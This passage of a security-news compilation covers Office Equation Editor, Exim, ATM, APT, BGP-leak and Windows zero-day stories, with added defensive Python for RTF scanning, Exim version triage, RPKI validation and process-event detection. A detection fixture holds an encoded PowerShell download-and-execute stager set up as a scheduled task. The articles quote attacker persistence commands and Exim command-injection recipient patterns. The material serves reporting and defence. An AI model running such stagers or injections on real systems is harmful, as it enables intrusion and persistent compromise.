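        evidence = [name for name, sig in EQUATION_MARKERS if sig in data]
        if objclass and objclass.lower().startswith("equation"):
            evidence.insert(0, "objclass=" + objclass)
        results.append({"objclass": objclass, "equation": bool(evidence), "evidence": evidence})
    return results


def ole1_stub(class_name):
    """Constructed OLE1-style object header carrying only a class name: a placeholder, not a real object."""
    name = class_name.encode("ascii") + b"\x00"
    return b"\x01\x05\x00\x00" + b"\x02\x00\x00\x00" + len(name).to_bytes(4, "little") + name + b"\x00" * 8


def rtf_with_object(objclass, data):
    """Build a minimal RTF document embedding one object (sample builder)."""
    cls = rb"{\*\objclass " + objclass.encode("ascii") + b"}" if objclass else b""
    return (rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\pard Invoice attached\par "
            rb"{\object\objemb" + cls + rb"{\*\objdata " + data.hex().encode("ascii") + rb"}}\par}")


# Constructed documents: declared Equation.3 object, Equation.3 object with no \objclass, benign Package object.
EQUATION_RTF = rtf_with_object("Equation.3", ole1_stub("Equation.3"))
HIDDEN_CLASS_RTF = rtf_with_object(None, ole1_stub("Equation.3"))
BENIGN_RTF = rtf_with_object("Package", ole1_stub("Package"))

if __name__ == "__main__":
    for name, doc in (("declared", EQUATION_RTF), ("hidden-class", HIDDEN_CLASS_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

A mail attachment that embeds Equation.3 at all is suspicious on its own: Microsoft removed the Equation Editor component in its January 2018 updates, so on a patched host there is nothing legitimate left for such an object to open. On the endpoint, EQNEDT32.EXE being started through the DCOM launcher while an Office application is open is the corresponding process-tree signal.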

Even though the flaw was patched in 2017, experts at Microsoft continue to see threat actors exploiting it in the wild, with a peak in the number of attacks leveraging the issue over the past few weeks.

“Notably, we saw increased activity in the past few weeks. We strongly recommend applying security updates.” states Microsoft.

Once the RTF attachment is opened, it will execute multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload.

The payload used in this campaign is a backdoor that attempts to connect to a malicious domain that is no longer accessible.

However, experts at Microsoft believe that attackers may use the same tactic to spread a new version of the backdoor that connects to an active C2.

Pierluigi Paganini

(SecurityAffairs – CVE-2017-11882, spam campaign)

The post Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw appeared first on Security Affairs.

Millions of Exim mail servers vulnerable to cyber attacks

Millions of Exim mail servers are exposed to attacks due to a critical vulnerability that makes it possible for unauthenticated remote attackers to execute arbitrary commands.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw can be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers running some non-default configurations.

The vulnerability, tracked as CVE-2019-10149, resides in the deliver_message() function in /src/deliver.c and is caused by improper validation of recipient addresses. It leads to remote command execution with root privileges on the mail server.

“In this particular case, RCE means Remote *Command* Execution, not Remote Code Execution: an attacker can execute arbitrary commands with execv(), as root; no memory corruption or ROP (Return-Oriented Programming) is involved.” reads the security advisory published by Qualys. “This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations).”

The CVE-2019-10149 flaw was dubbed “The Return of the WIZard”, a reference to Sendmail’s ancient WIZ and DEBUG vulnerabilities.

The flaw is easily exploitable by a local attacker, and by a remote attacker in certain non-default configurations; experts believe that threat actors will soon start using it in attacks in the wild.

Experts explained that in order to remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days, transmitting one byte every few minutes; however, Qualys does not guarantee that this is the only exploitation method.

Experts pointed out that the following non-default Exim configurations could be easily exploited by a remote attacker:

  • If the “verify = recipient” ACL was removed manually by an administrator (maybe to prevent username enumeration via RCPT TO), then our local-exploitation method also works remotely.
  • If Exim was configured to recognize tags in the local part of the recipient’s address (via “local_part_suffix = +* : -*” for example), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO “balrog+${run{…}}@localhost” (where “balrog” is the name of a local user).
  • If Exim was configured to relay mail to a remote domain, as a secondary MX (Mail eXchange), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO “${run{…}}@khazad.dum” (where “khazad.dum” is one of Exim’s relay_to_domains). Indeed, the “verify = recipient” ACL can only check the domain part of a remote address (the part that follows the @ sign), not the local part.

The CVE-2019-10149 flaw was addressed by the Exim development team with the release of version 4.92 in February. Unfortunately, a large number of installations are still running vulnerable versions.
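A first-pass inventory check for your own mail estate, added here as an example and not code from Qualys or the Exim project: it parses the version out of the SMTP 220 greeting and reports whether it falls in the 4.87 to 4.91 range. The greetings below are constructed with placeholder hostnames. One caveat that matters in practice: distributions backport the fix without bumping the advertised version, so a banner that reads 4.91 may already be patched, and a banner can be edited by the administrator; treat the result as a triage filter, not proof.

```python
import re
import socket

BANNER_RE = re.compile(r"\bExim\s+(\d+)\.(\d+)(?:\.(\d+))?", re.IGNORECASE)
AFFECTED_MIN = (4, 87)
AFFECTED_MAX = (4, 91)   # 4.92 ships the fix


def parse_exim_version(banner):
    """Return (major, minor, patch) from an SMTP greeting, or None if it is not an Exim banner."""
    m = BANNER_RE.search(banner)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def classify_banner(banner):
    """'affected-range', 'fixed', 'older' or 'not-exim'. A version string alone is not proof:
    distributions backport the fix without changing the advertised version."""
    version = parse_exim_version(banner)
    if version is None:
        return "not-exim"
    if AFFECTED_MIN <= version[:2] <= AFFECTED_MAX:
        return "affected-range"
    return "older" if version[:2] < AFFECTED_MIN else "fixed"


def grab_banner(host, port=25, timeout=5.0):
    """Read the 220 greeting from a live server (network access; not used by the offline samples)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        return s.recv(512).decode("utf-8", "replace").strip()


def triage(banners):
    """Map each banner to (hostname, verdict), taking the hostname from the 220 line."""
    out = []
    for banner in banners:
        parts = banner.split()
        host = parts[1] if len(parts) > 1 else "?"
        out.append((host, classify_banner(banner)))
    return out


# Constructed greetings in the format Exim and other MTAs use; hosts are placeholders.
SAMPLE_BANNERS = [
    "220 mail.example.invalid ESMTP Exim 4.91 Ubuntu Thu, 06 Jun 2019 10:00:00 +0000",
    "220 mx.example.invalid ESMTP Exim 4.92 #3 Thu, 06 Jun 2019 10:00:01 +0000",
    "220 old.example.invalid ESMTP Exim 4.86.2 Thu, 06 Jun 2019 10:00:02 +0000",
    "220 smtp.example.invalid ESMTP Postfix",
    "220 relay.example.invalid ESMTP Exim 4.87 Thu, 06 Jun 2019 10:00:03 +0000",
]

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_BANNERS):
        print("%-24s %s" % (host, verdict))
```

On a host you administer, exim -bV prints the running version and the distribution's package changelog says whether CVE-2019-10149 has been backported; that is the authoritative answer, the banner is only where to start.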

Querying Shodan for vulnerable versions of Exim returns 4,353,180 installs, most of them in the United States (2,462,098).

Exim flaw

Searching for patched Exim installs running the 4.92 release returns 1,071,818 systems.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)

The post Millions of Exim mail servers vulnerable to cyber attacks appeared first on Security Affairs.

Security Affairs newsletter Round 217 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Once again thank you!

ESET analyzes Turla APTs usage of weaponized PowerShell
Leicester City Football Club disclosed a card breach
ProtonMail denies that it spies on users for government agencies
Expert shows how to Hack a Supra Smart Cloud TV
Gaining Root Access to Host through rkt Container hack
Google is taking action on deceptive installation tactics for Chrome Browser Extensions
Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more
Threat actors abuse Microsoft Azure to Host Malware and C2 Servers
A month later Gamaredon is still active in Eastern Europe
Australian teenager hacked into Apple twice for a job
CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions
macOS zero-day in Mojave could allow Synthetic Clicks attacks
OilRig's Jason email hacking tool leaked online
BlackSquid malware uses multiple exploits to drop cryptocurrency miners
Expert developed a MetaSploit module for the BlueKeep flaw
NSA urges Windows Users and admins to Patch BlueKeep flaw
Tens of millions of patients impacted by the AMCA data breach
The Australian National University suffered a major, sophisticated attack
0patch experts released an unofficial patch for the recent Windows 10 Task Scheduler zero-day
Analyzing APT34's Jason project
Cisco disclosed several flaws in Cisco Industrial Network Director
Platinum APT leverages steganography to hide C2 communications
Remote code execution flaw in Ministra IPTV Platform exposes user data and more
Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android
VMware addressed flaws in its Workstation and Tools
Crooks stole about $10 million from GateHub cryptocurrency wallet service
Cryptocurrency startup Komodo hacks itself to protect its users funds from hackers
Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know
New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers
SandboxEscaper releases Byebear exploit to bypass patched EoP flaw
Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks
Hunting the ICEFOG APT group after years of silence
Recently a large chunk of European mobile traffic was rerouted through China Telecom

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 217 – News of the week appeared first on Security Affairs.

Critical RCE affects older Diebold Nixdorf ATMs

Automated teller machine vendor Diebold Nixdorf has released security updates to address a remote code execution vulnerability in older ATMs.

Diebold Nixdorf discovered a remote code execution vulnerability in older ATMs and is urging its customers to install the security updates it has released to address the flaw.

The vulnerability affects older Opteva model ATMs; Diebold Nixdorf will start notifying customers next week.

The security research group NightSt0rm published technical details about the vulnerability in a blog post on Medium. The experts explained that they had access to a Diebold ATM and started analyzing the machine, a simple PC running Windows that exposes some services implemented by the ATM vendor. They focused their analysis on the Spiservice service listening on port 8043.

“Look at the output of the command, there is a service (Spiservice) which is running on port 8043. The SpiService.exe is associated with XFS, the Extension for Financial Services DLL library (MSXFS.dll) that is specifically used by ATMs.” reads the post published by the experts. “The library provides a special API for the communication with the ATM’s PIN pad and the cash dispenser.”

The ATM tested by the experts runs Agilis XFS for Opteva version 4.1.61.1. Attempting to connect to the service via a web browser, the experts noticed that it loads many libraries, including one called VDMXFS.dll.

According to Diebold Nixdorf, this service only runs on Opteva version 4.x software; later versions are not affected.

The application calls RemotingConfiguration.Configure with “server.config” as the parameter used to load its configuration. Analyzing the file, the experts discovered that the program uses .NET Remoting, a technique that allows different applications to communicate with each other.

The researchers created two applications to interact remotely with the service and captured the network traffic; in this way they identified the HTTP SOAP protocol used for the communication.

The ATM maker released Agilis XFS for Opteva – BulkCashRec (BCRM) version 4.1.22, which no longer exposes the service’s configuration over the network.

The experts pointed out that this attack can be prevented by properly configuring the terminal-based firewall included in older versions of Opteva ATMs. The good news is that the firewall is enabled by default, which means that only ATM owners who disabled it are at risk.

The NightSt0rm team attempted to report the issue to Diebold Nixdorf but did not receive a reply.

At the time of writing, there is no news of attacks in the wild exploiting this RCE flaw.

Pierluigi Paganini

(SecurityAffairs – Diebold Nixdorf, ATM)

The post Critical RCE affects older Diebold Nixdorf ATMs appeared first on Security Affairs.

Hunting the ICEFOG APT group after years of silence

A security researcher found new evidence of activity by the ICEFOG APT group, also tracked by experts as Fucobha.

Chi-en (Ashley) Shen, a senior security researcher at FireEye, collected evidence that demonstrates that China-linked APT group ICEFOG (aka Fucobha) is still active.

The activities of the APT group were first uncovered by Kaspersky Lab in September 2013; at the time the researchers described the crew as an emerging group of cyber-mercenaries able to carry out surgical hit-and-run operations against strategic targets. The cyber mercenaries were recruited by governments and private companies, and the group was composed of highly skilled hackers able to conduct sophisticated attacks.

The APT group is considered a persistent collector of sensitive information; the Kaspersky team detected a series of attacks against the defense supply chain (e.g. military contractors, shipbuilders, satellite operators, high-tech companies) in Japan and South Korea.

The Icefog team also targeted companies in the US energy industry; the threat actors used a custom backdoor dubbed “Fucobha”, which came with exploits for both Microsoft Windows and Mac OS X.

At the time the “hit and run” nature of the operations appeared unusual: the attackers processed victims rapidly, stealing only information of interest and showing deep knowledge of the targets and of the information they were looking for.

The group went dark just after Kaspersky shared the findings of its investigation in September 2013.

This week, Chi-en (Ashley) Shen presented her analysis of new malware samples associated with the ICEFOG group at the CONFidence cybersecurity conference held in Poland.

Two of them, tracked as ICEFOG-P and ICEFOG-M, have been used in targeted attacks in 2014 and 2018, respectively. Samples of both variants have been compiled between 2014 and 2019.

icefog

Both ICEFOG-P and ICEFOG-M are more complex than the original backdoor, a circumstance that suggests the threat actors have continued to develop and use it.

ICEFOG-M is the latest variant; it is fileless, supports the same features as ICEFOG-P, and leverages HTTPS for communications.

The researcher explained that the ICEFOG-P variant is not particularly complex; it remained under the radar simply because it was rarely used.

The researcher also spotted a Mac version of the malware, tracked as MacFog, that was previously unknown to the security community. MacFog was initially distributed on Chinese forums.

Unlike the operations observed between 2011 and 2013, the new malware variants were involved in multiple campaigns conducted by different groups.

Shen spotted variants of the ICEFOG malware in attacks targeting:

  • an unnamed agriculture company in Europe in 2015
  • government, media, and finance organizations in Russia and Mongolia in 2015 (TOPNEWS campaign)
  • the government of multiple former Soviet states in 2015 (Roaming Tiger)
  • Kazakh officials in 2016 (APPER campaign)
  • water source provider, banks, and government entities in Turkey, India, Kazakhstan, Uzbekistan, and Tajikistan in 2018 (WATERFIGHT campaign)
  • an unknown entity in the Philippines in 2018 (PHKIGHT campaign)
  • organizations in Turkey and Kazakhstan in 2018 and 2019 (SKYLINE campaign)

In the latest campaign in 2019, tracked as the SKYLINE campaign, hackers targeted Turkey and Kazakhstan; timestamps suggest the campaign might have been active since at least 2018. Attackers leveraged a shared CVE-2017-11882 exploit template and used a fileless version of ICEFOG-M.

icefog attacks timeline

According to Shen, most samples were involved in cyber espionage campaigns, and the threat actors appear to be politically motivated.

Below are the conclusions of the excellent analysis conducted by Shen:

  • ICEFOG is malware shared among Roaming Tiger, APT15, Temp Group A and suspected APT9.
  • Shared malware is a pitfall for attribution, we should not do attribution only based on malware.
  • Temp Group A is aggressively using ICEFOG-P and ICEFOG-M to target Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey.
  • With the file-less ICEFOG-M, host-based detection for payloads is more difficult.
  • Continued development indicates there could be more attacks leveraging ICEFOG in future campaigns, and possibly leveraged by more attackers

Pierluigi Paganini

(SecurityAffairs – cyberespionage, hacking)

The post Hunting the ICEFOG APT group after years of silence appeared first on Security Affairs.

Recently a large chunk of European mobile traffic was rerouted through China Telecom

On June 6, for more than two hours, China Telecom re-routed a large chunk of European mobile traffic through its infrastructure.

In November, security researchers Chris C. Demchak and Yuval Shavitt published a paper detailing how China Telecom has been misdirecting Internet traffic through China over the past years. The experts speculated that these were intentional BGP hijacking attacks.

The term BGP hijacking is used to indicate the illegitimate takeover of groups of IP addresses by corrupting Internet routing tables maintained using the Border Gateway Protocol (BGP).

Now a new case involves China Telecom: on June 6, for more than two hours, a large chunk of European mobile traffic was rerouted through the infrastructure of the Chinese ISP.

China Telecom Traffic Hijacking 3

China Telecom was originally a brand of the state-owned China Telecommunications Corporation; after the marketization of the enterprise, the brand and operating companies were spun off as a separate group.

China Telecom is currently present in North American networks with 10 points-of-presence (PoPs) (eight in the United States and two in Canada), spanning major exchange points.

The latest incident was caused by the propagation of routing announcements beyond their intended scope, a so-called BGP route leak.

The BGP route leak originated at the Swiss data center company Safe Host, which accidentally leaked over 70,000 routes from its routing table to the Chinese ISP.

China Telecom did not discard the leaked routes; instead, it announced Safe Host’s routes onward as its own, which means that traffic for many European mobile networks was re-routed through its network.

“Beginning at 09:43 UTC today (6 June 2019), Swiss data center colocation company Safe Host (AS21217) leaked over 70,000 routes to China Telecom (AS4134) in Frankfurt, Germany.” reads the analysis published by Oracle. “China Telecom then announced these routes on to the global internet redirecting large amounts of internet traffic destined for some of the largest European mobile networks through China Telecom’s network.”

Most impacted European networks included Swisscom (AS3303) of Switzerland, KPN (AS1130) of Holland, and Bouygues Telecom (AS5410) and Numericable-SFR (AS21502) of France.

The traffic was redirected for over two hours, and many of the leaked routes were more-specifics of routed prefixes, a circumstance that suggests the use of route optimizer technology.

Users of the affected mobile networks experienced connection lag, and in some cases they were unable to connect to some servers.

“Today’s incident shows that the internet has not yet eradicated the problem of BGP route leaks,” concludes Oracle.

“It also reveals that China Telecom, a major international carrier, has still implemented neither the basic routing safeguards necessary both to prevent propagation of routing leaks nor the processes and procedures necessary to detect and remediate them in a timely manner when they inevitably occur. Two hours is a long time for a routing leak of this magnitude to stay in circulation, degrading global communications.”

How can such incidents be prevented?

Security experts are pushing network operators to adopt solutions that protect BGP; Cloudflare, for example, argues that Resource Public Key Infrastructure (RPKI) could secure BGP routing. One caveat a practitioner should keep in mind: RPKI route origin validation only checks that the origin AS and the prefix length of an announcement match a published ROA. It flags a more-specific announced beyond a ROA's maximum length as invalid, which covers route-optimizer leaks like the ones seen here provided the affected networks publish ROAs, but a leaked route that keeps its legitimate origin AS passes origin validation unchanged. Operators therefore still need prefix filtering toward customers and peers (and, in the longer term, AS-path validation) to stop leaks like this one.
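To make that distinction concrete, the following Python is an added example (not code from Oracle, Cloudflare or Security Affairs) that implements RFC 6811 route origin validation against a constructed ROA table built from documentation prefixes (RFC 5737) and AS numbers (RFC 5398), plus a simplified customer prefix-list filter of the kind a transit provider applies at its edge. The ROAs, prefixes, AS paths and the allowed-prefix list are all constructed for illustration, and the prefix-list filter is a deliberate simplification of IRR-based filtering.

```python
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class Roa:
    """Route Origin Authorization: origin_as may announce `prefix` and its
    sub-prefixes down to `max_length` bits."""
    prefix: str
    max_length: int
    origin_as: int


# Constructed ROA table (documentation prefixes and ASNs, not real ROAs).
ROAS: List[Roa] = [
    Roa("192.0.2.0/24", 24, 64496),      # /24 only, no more-specifics allowed
    Roa("198.51.100.0/24", 26, 64497),   # origin may deaggregate down to /26
]


def validate_route(prefix: str, origin_as: int, roas: Iterable[Roa] = ROAS) -> str:
    """RFC 6811 origin validation: returns 'valid', 'invalid' or 'notfound'."""
    net = ipaddress.ip_network(prefix, strict=False)
    covered = False
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix, strict=False)
        if net.version != roa_net.version or not net.subnet_of(roa_net):
            continue
        covered = True  # at least one ROA covers this prefix
        if roa.origin_as == origin_as and net.prefixlen <= roa.max_length:
            return "valid"
    return "invalid" if covered else "notfound"


def rov_for_path(prefix: str, as_path: List[int], roas: Iterable[Roa] = ROAS) -> str:
    """ROV inspects only the origin (right-most) AS of the path. Transit ASes
    that should never have carried the route are not checked, so a leak that
    preserves the genuine origin passes ROV unchanged."""
    return validate_route(prefix, as_path[-1], roas)


def accept_from_customer(prefix: str, allowed: Iterable[str]) -> bool:
    """Edge prefix-list filter: accept a customer's announcement only if it lies
    within a prefix that customer is authorized to announce. Applied to the
    leaking session, this drops foreign routes before they propagate."""
    net = ipaddress.ip_network(prefix, strict=False)
    for allowed_prefix in allowed:
        allowed_net = ipaddress.ip_network(allowed_prefix, strict=False)
        if net.version == allowed_net.version and net.subnet_of(allowed_net):
            return True
    return False


if __name__ == "__main__":
    # Legitimate announcement by the ROA holder.
    print(validate_route("192.0.2.0/24", 64496))                 # valid
    # Origin hijack: another AS claims the prefix.
    print(validate_route("192.0.2.0/24", 64500))                 # invalid
    # Route-optimizer style more-specific with the real origin: it exceeds
    # max_length, so ROV catches it.
    print(validate_route("192.0.2.0/25", 64496))                 # invalid
    # Exact-prefix leak carried through transit ASes never authorized for it:
    # ROV is blind to the path and still says valid.
    print(rov_for_path("192.0.2.0/24", [64510, 64511, 64496]))   # valid
    # A customer prefix-list stops that same leak at the edge.
    print(accept_from_customer("192.0.2.0/24", ["203.0.113.0/24"]))  # False
```

The last two calls are the point of the example: the exact-prefix leak is invisible to origin validation, and only the edge filter on the customer session rejects it.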

Pierluigi Paganini

(SecurityAffairs – BGP hijacking, China Telecom)

The post Recently a large chunk of European mobile traffic was rerouted through China Telecom appeared first on Security Affairs.

Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks

Cisco Talos experts uncovered a new wave of attacks, tracked as the Frankenstein campaign, in which the attackers used tools built by combining four open-source techniques.

Security experts at Cisco Talos uncovered a series of highly targeted attacks, tracked as the Frankenstein campaign, in which the hackers used tools built by combining four different open-source techniques.

The attackers behind the Frankenstein campaign carried out several malware-based attacks between January and April 2019. Talos researchers found only a low volume of the related documents in malware repositories, which is why they assess the activity as highly targeted.

“Cisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the Frankenstein campaign.” reads the analysis published by Cisco Talos. “We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein — the name refers to the actors’ ability to piece together several unrelated components — leveraged four different open-source techniques to build the tools used during the campaign.”

Talos researchers believe the attackers are moderately sophisticated but highly resourceful.

The attackers used multiple anti-detection techniques, such as checking whether analysis tools like Process Explorer were running in the background and determining whether the malicious code was running in a virtualized environment.

Other anti-detection techniques included having the command-and-control server respond only to GET requests that contained predefined fields, and encrypting data in transit.

Talos experts identified two weaponized Word documents used in the Frankenstein campaign that were likely sent to the victims via email. The first document, named “MinutesofMeeting-2May19.docx”, displays the national flag of Jordan; once opened, it fetches a remote template that triggers an exploit for CVE-2017-11882 (the Microsoft Office Equation Editor memory corruption flaw) to execute code on the target machine.

“Once the victim opens the document, it fetches a remote template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim’s machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named “WinUpdate”.” continues the analysis.

“/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR” That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager.”


The second sample prompts the victim to enable macros and run a Visual Basic script. 

One of the documents detected by the experts is disguised as a document created by the security firm Kaspersky; in two other cases the attackers used documents specifically designed to target Middle Eastern entities.

Experts also described a

In the second scenario observed by Talos, the threat actors used a weaponized document whose macro, once enabled, executes a Visual Basic for Applications (VBA) script implementing two anti-analysis features.

The script first queries Windows Management Instrumentation (WMI) to check if specific applications are running: VMWare, Vbox, Process Explorer, Process Hacker, ProcMon, Visual Basic, Fiddler, and WireShark. Then the script checks if specific tasks are running: VMWare, Vbox, VxStream, AutoIT, VMtools, TCPView, WireShark, Process Explorer, Visual Basic, and Fiddler. 

If the script finds one of the above applications or tasks, it halts its execution; otherwise it queries WMI for the number of CPU cores allocated to the system and exits if there are fewer than two, a common check because many analysis sandboxes run with a single core.

Once the evasion checks were complete, the attackers used MSBuild to execute an actor-created file named “LOCALAPPDATA\Intel\instal.xml”. According to Talos, the threat actors chose MSBuild because it is a signed Microsoft binary that can compile and run code embedded in a project file, which lets it execute arbitrary code while bypassing application whitelisting controls on the host.
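The persistence step quoted above (a daily scheduled task whose action is a base64-encoded PowerShell stager) and the MSBuild step both leave traces in process-creation telemetry. The following Python is an added example, not part of the Talos write-up, that runs three detections over a handful of constructed Sysmon-style process events: a child process spawned by the Equation Editor (EQNEDT32.EXE, the process CVE-2017-11882 exploits; treating any child of it as suspicious is a general detection assumption of this example, not a statement from the Talos report), a schtasks /Create whose action is PowerShell with an encoded command (decoded so the analyst sees the stager), and MSBuild.exe running a project file from the user's AppData\Local tree. The event shapes, file paths, user name and stager string are all constructed.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed stager, encoded the way PowerShell -EncodedCommand expects (UTF-16LE).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (Sysmon Event ID 1 shape). Paths are invented.
EVENTS: List[Dict[str, str]] = [
    {   # 1. Equation Editor spawning a shell after the exploit document runs
        "parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": r'cmd.exe /c "%TEMP%\run.cmd"',
    },
    {   # 2. Persistence: daily scheduled task whose action is an encoded stager
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": "schtasks /Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR "
                   f'"powershell -w hidden -enc {ENCODED_STAGER}"',
    },
    {   # 3. MSBuild used as a LOLBin to run a project file dropped under AppData
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
        "cmdline": r"MSBuild.exe C:\Users\alice\AppData\Local\Intel\instal.xml",
    },
    {   # 4. Benign: a developer building a project from a source tree
        "parent": r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe",
        "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
        "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build",
    },
    {   # 5. Benign: vendor updater task with a plain executable as its action
        "parent": r"C:\Program Files\Vendor\setup.exe",
        "image": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r'schtasks /Create /SC DAILY /TN VendorUpdate /TR "C:\Program Files\Vendor\update.exe"',
    },
]

# -e / -ec / -enc / -EncodedCommand (or the / form) followed by a base64 blob.
ENC_RE = re.compile(r"(?i)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event: Dict[str, str]) -> List[str]:
    """Names of the detections that fire for one process-creation event."""
    hits: List[str] = []
    image, parent = basename(event["image"]), basename(event["parent"])
    cmd = event["cmdline"]
    low = cmd.lower()

    # The Equation Editor has no legitimate reason to launch child processes.
    if parent == "eqnedt32.exe":
        hits.append("eqnedt32_child_process")

    # Scheduled task whose action is PowerShell carrying an encoded command.
    if image == "schtasks.exe" and "/create" in low and "powershell" in low:
        if decode_encoded_command(cmd) is not None:
            hits.append("schtasks_encoded_powershell")

    # MSBuild executing a project file out of the user's AppData\Local tree
    # (a heuristic: real build trees normally live elsewhere).
    if image == "msbuild.exe" and "\\appdata\\local\\" in low:
        hits.append("msbuild_project_in_localappdata")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> detections, omitting events that raise none."""
    results: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        hits = analyze_event(event)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for index, hits in scan(EVENTS).items():
        print(index, hits, decode_encoded_command(EVENTS[index]["cmdline"]))
```

Decoding the encoded command matters in practice: the task name "WinUpdate" looks innocuous, and only the UTF-16LE plaintext tells the analyst that the action is a download-and-execute stager rather than a local script.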

The attackers used a PowerShell Empire agent to gather information on the local system, including the username, domain name, machine name, public IP address, administrative privileges, currently running processes, operating system version, and the security system’s SHA256 HMAC.

Then the data is sent back to the C&C server via an encrypted channel.

“A campaign that leverages custom tools is more easily attributed to the tools’ developers. One example of this was the code overlap in the VPNFilter malware that allowed us to associate the activity with the BlackEnergy malware.” Talos concludes. “By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence.”

Pierluigi Paganini

(SecurityAffairs – Frankenstein campaign, hacking)

The post Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks appeared first on Security Affairs.

SandboxEscaper releases Byebear exploit to bypass patched EoP flaw

SandboxEscaper publicly disclosed a second Windows zero-day exploit dubbed ByeBear to bypass a recently patched elevation of privilege issue.

SandboxEscaper is a well of never-ending surprises: today she publicly disclosed a second Windows zero-day exploit (dubbed ByeBear) that bypasses the patch for a recently fixed elevation of privilege issue.

SandboxEscaper is a well-known researcher who has publicly disclosed several zero-day exploits for unpatched Windows flaws. At the end of May, she disclosed four Microsoft zero-day flaws in just 24 hours.

One of them was a bypass of the patch for CVE-2019-0841, an elevation of privilege flaw in the way the Windows AppX Deployment Service (AppXSVC) handles hard links.

Evidently, the fix did not completely solve the problem, because SandboxEscaper has now developed a new exploit that triggers the flaw while bypassing the Microsoft security patch.

The researcher explained that a specially crafted malicious application could use the flaw to escalate its privileges and take complete control of the Windows machine.

SandboxEscaper published a video PoC of the ByeBear exploit, which abuses the Microsoft Edge browser to write a discretionary access control list (DACL) with SYSTEM privileges.

“It’s going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes, it means you either have 1 core or set your VM to have multiple processors instead of multiple cores… which will also cause it to lock up,” wrote SandboxEscaper.

“This bug is most definitely not restricted to the edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes.”

“I think it will also trigger by just launching edge once, but sometimes you may have to wait for a little. I didn’t do extensive testing…found this bug and quickly wrote up a PoC, took me like 2 hours total, finding LPEs is easy.”

In August 2018, SandboxEscaper disclosed a first zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems.

In 2018, SandboxEscaper also publicly dropped exploits for two other Windows zero-day vulnerabilities, forcing Microsoft to quickly address them to avoid its users being targeted by hackers.

In October, SandboxEscaper released proof-of-concept exploit code for a flaw in the Microsoft Data Sharing Service that allowed a low-privileged user to delete critical system files from Windows systems.

In December, she published proof-of-concept (PoC) code for a new Windows zero-day, the fourth she released that year.

Microsoft plans to release its Patch Tuesday security updates for June on June 11, and experts believe they will address the ByeBear zero-day and the four previous exploits disclosed by the researcher.

Pierluigi Paganini

(SecurityAffairs – ByeBear, hacking)

The post SandboxEscaper releases Byebear exploit to bypass patched EoP flaw appeared first on Security Affairs.

Crooks stole about $10 million from GateHub cryptocurrency wallet service

Cyber criminals stole 3.2 million Ripple coins (XRP), worth nearly $10 million, from the users of the GateHub cryptocurrency wallet service.

